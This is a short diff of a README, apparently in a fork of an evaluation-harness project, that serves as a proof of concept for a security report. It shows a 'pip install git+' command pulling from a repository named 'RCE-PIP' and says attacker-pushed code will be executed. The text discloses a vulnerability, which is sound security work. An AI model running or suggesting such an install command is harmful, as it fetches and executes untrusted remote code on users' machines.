robertgshaw2-neuralmagic/lm-evaluation-harness/README.md

 pip install git+https://github.com/slvignesh05/RCE-PIP.git
 ```

-The Malicious codes pushed in the repo by attacker will be executed!.
-Proof of Concept for a security report
+NOTE :This repo contains the Proof of Concept for a security report